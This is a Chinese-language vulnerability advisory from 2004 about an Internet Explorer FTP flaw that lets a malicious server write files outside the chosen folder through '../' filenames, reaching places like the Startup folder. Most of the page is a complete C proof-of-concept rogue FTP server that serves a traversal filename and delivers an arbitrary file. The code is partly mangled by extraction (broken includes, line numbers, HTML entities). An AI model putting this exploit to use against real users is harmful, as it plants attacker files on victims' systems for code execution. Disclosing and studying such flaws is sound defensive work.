Microsoft Internet Explorer FTP下载路径目录遍历漏洞

发布日期:2004-12-30
更新日期:2005-01-04

受影响系统:
Microsoft Internet Explorer 6.0SP1
Microsoft Internet Explorer 6.0
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 2000
描述:
--------------------------------------------------------------------------------
Microsoft Internet Explorer是一款流行的WEB浏览器。

Microsoft Internet Explorer的FTP协议实现不正确,远程攻击者可以利用这个漏洞下载文件到本地任意目标系统目录中。

当从通过MSIE从FTP服务器保存文件到本地文件夹,会保存在local_folder/file_name,不过如果文件名包含../,文件的实际路径就会更改,通过设置恶意文件名和恶意FTP服务器,诱使用户通过脱拉文件,或者左点击后保存,可导致把文件保存在系统其他目录中,如保存在C:\Documents and settings\All Users\Start menu\Programs\Start可导致任意命令执行。

不过利用双击过程来下载文件不受此漏洞影响。

<*来源:Albert Puigsech Galicia ([email protected]

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110461358930103&w=2
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Albert Puigsech Galicia ([email protected])提供了如下测试方法:

/*

  • Internet Explorer FTP download path disclosure fucked prof of concept (7a69Adv#17)
  • ?DOES NOT WORK USING PASV MODE, YOU MUST CODE IT IF YOU WANT !!!

*/

#include

  1<stdio.h>   
  2#include <unistd.h>   
  3#include <fcntl.h>   
  4#include <sys types.h="">   
  5#include <sys stat.h="">   
  6#include <sys socket.h="">   
  7#include <netinet in.h="">   
  8#include <errno.h>   
  9  
 10#define MAX_BUF 1024   
 11#define FTP_PORT 21   
 12  
 13int main(int argc, char **argv) {   
 14char ch;   
 15char buffer[MAX_BUF + 1];   
 16char ipbuf[MAX_BUF + 1];   
 17char *local_file, *remote_file;   
 18int sfdmain, sfdses, sfddata;   
 19int readed;   
 20int ip1,ip2,ip3,ip4,port1,port2;   
 21int fd;   
 22struct stat st;   
 23struct sockaddr_in ftpmain = { AF_INET, htons(FTP_PORT), INADDR_ANY };   
 24struct sockaddr_in ftpdata;   
 25  
 26if (argc &lt; 3) {   
 27printf("\t7a69Adv#17 - Internet Explorer FTP download path disclosure prof of \   
 28concept\n"); printf("Use:\n");   
 29printf("\t%s <local_file> <remote_file>\n", argv[0]);   
 30exit(0);   
 31}   
 32  
 33local_file = argv[1];   
 34remote_file = argv[2];   
 35  
 36if ((fd = open(local_file, O_RDONLY)) == -1) {   
 37perror("open()");   
 38exit(-1);   
 39}   
 40  
 41if ((sfdmain = socket(AF_INET, SOCK_STREAM, 0)) == -1) {   
 42perror("socket()");   
 43exit(-1);   
 44}   
 45  
 46if (bind(sfdmain, (struct sockaddr *)&amp;ftpmain, sizeof(struct sockaddr)) == -1) {   
 47perror("bind()");   
 48exit(-1);   
 49}   
 50  
 51if (listen(sfdmain, 1) == -1) {   
 52perror("listen()");   
 53exit(-1);   
 54}   
 55  
 56if ((sfdses = accept(sfdmain, NULL, NULL)) == -1) {   
 57perror("accept()");   
 58exit(-1);   
 59}   
 60  
 61write(sfdses, "200 OK\r\n", 8);   
 62  
 63while ((readed = read(sfdses, buffer, MAX_BUF)) &gt; 0) {   
 64buffer[readed] = 0;   
 65printf("&gt;&gt; %s", buffer);   
 66if (!strncmp(buffer, "noop", 4)) write(sfdses, "200 OK\r\n", 8);   
 67else if (!strncmp(buffer, "USER ", 5)) write(sfdses, "331 OK\r\n", 8);   
 68else if (!strncmp(buffer, "PASS ", 5)) write(sfdses, "230 OK\r\n", 8);   
 69else if (!strncmp(buffer, "CWD ", 4)) write(sfdses, "250 OK\r\n", 8);   
 70else if (!strncmp(buffer, "PWD", 3)) write(sfdses, "257 \"/\"\r\n", 9);   
 71else if (!strncmp(buffer, "TYPE ", 5)) write(sfdses, "200 OK\r\n", 8);   
 72else if (!strncmp(buffer, "PORT ", 5)) {   
 73sscanf(&amp;buffer[5], "%i,%i,%i,%i,%i,%i", &amp;ip1, &amp;ip2, &amp;ip3, &amp;ip4, &amp;port1, &amp;port2);   
 74snprintf(ipbuf, MAX_BUF, "%i.%i.%i.%i", ip1, ip2, ip3, ip4);   
 75ftpdata.sin_family = AF_INET;   
 76ftpdata.sin_addr.s_addr = inet_addr(ipbuf);   
 77ftpdata.sin_port = htons(port1*256+port2);   
 78if ((sfddata = socket(AF_INET, SOCK_STREAM, 0)) == -1) {   
 79perror("socket()");   
 80exit(-1);   
 81}   
 82if (connect(sfddata, (struct sockaddr *)&amp;ftpdata, sizeof(struct sockaddr)) == -1) \   
 83{ write(sfdses, "421 OK\r\n", 8);   
 84} else {   
 85write(sfdses, "220 OK\r\n", 8);   
 86}   
 87}   
 88else if (!strncmp(buffer, "LIST", 4)) {   
 89write(sfdses, "150 OK\r\n", 8);   
 90snprintf(buffer, MAX_BUF, "-rwxrwxrwx 1 0 0 1 Dec 08 07:36 \   
 91/../../../../../../../../../../..%s\r\n", remote_file); write(sfddata, buffer, \   
 92strlen(buffer)); close(sfddata);   
 93write(sfdses, "226 OK\r\n", 8);   
 94  
 95}   
 96else if(!strncmp(buffer, "RETR ", 5)) {   
 97write(sfdses, "150 OK\r\n", 8);   
 98fstat(fd, &amp;st);   
 99while(st.st_size-- &gt; 0) {   
100read(fd, &amp;ch, 1);   
101write(sfddata, &amp;ch, 1);   
102}   
103close(sfddata);   
104write(sfdses, "226 OK\r\n", 8);   
105}   
106else if (!strncmp(buffer, "QUIT", 4)) {   
107write(sfdses, "221 OK\r\n", 8);   
108close(sfdses); close(sfdmain); close(sfddata);   
109}   
110else   
111write(sfdses, "500 WTF\r\n", 9);   
112  
113  
114}   
115}   
116  
117建议:   
118\--------------------------------------------------------------------------------   
119厂商补丁:   
120  
121Microsoft   
122\---------   
123目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:   
124  
125http://www.microsoft.com/windows/ie/default.asp</remote_file></local_file></errno.h></netinet></sys></sys></sys></fcntl.h></unistd.h></stdio.h>
Published At
Categories with 网络技术
Tagged with
comments powered by Disqus